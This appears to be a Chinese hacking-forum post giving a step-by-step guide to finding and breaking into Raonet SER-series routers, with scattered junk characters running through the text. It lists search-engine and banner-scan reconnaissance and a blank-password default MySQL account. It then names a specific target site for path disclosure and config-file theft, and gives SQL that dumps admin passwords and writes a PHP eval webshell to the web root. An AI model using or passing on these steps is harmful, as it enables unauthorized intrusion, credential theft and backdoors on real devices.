寻找存在漏洞的路由器方法:5 U3 M6 T* c+ W0 K: `# E! d U6 W
$ F2 N& Z. H2 m% Y1:google搜索'Raonet Subscriber Ethernet Router'
5 s. U% \7 o" p1 m! F) K
( q7 f: G% P z1 g. Y. U1 p, S2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
$ f6 ~, {; R5 y' |, [2 w3 w# O' _. @' `$ p5 \1 V$ x
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
, \. F* {$ u, _; F0 j6 X k" z3 d R
& r M! A p% v% `//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
O5 `8 _: S( P" k5 l3 Y
6 J* s) f3 y5 |$ m/ _2 R) O, z7 o 1 D7 W$ }8 T+ T8 g9 Y
; a8 j% T/ X+ t" }8 t入侵步骤:; o8 A q2 D- d% V \' S' c1 f
- ^' f* G+ |! `% O" R( C |3 \
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php, x. L4 s& V. D* Y; L2 [7 n9 G
1 v3 z, ?& e& H. |2 v% Z2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
, c. F+ V1 V! D1 X1 U7 h. }3:得到密码后连接,查看GUI管理密码:
0 N) }3 a* E( A; P) j5 i; Buse ser_500
a2 a! B5 T, L, G' q; ?1 D) }8 nselect id,passwd from user;
% s$ p( A) }6 |) e4 G9 O: y# W4:通过数据库写入webshell,执行命令:
$ ]2 w0 p! }9 s7 L7 yuse mysql;4 ^" L% D9 u: S4 e
create table ok(cmd TEXT);
3 V, i2 Y+ }1 b# m+ Qinsert into ok values("<?php @eval($_POST[cmd])?>");! ]2 R. e4 I, `& B
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
5 I5 _# k: L6 k7 Q! {drop table ok;9 x% v8 b* \" r6 }0 I$ f/ e2 ~* Y' Y
* b; U: T* T. s8 H i1 v
5:连接后门shell.php
, t/ h$ w) y) ^. C8 H5 s! z! [8 X: M. z& ]+ s3 g
6. 搞定!. R# K4 m4 y+ Q% \3 e/ Y
% Y" f& @: h. z& {' C* v4 H1 O
|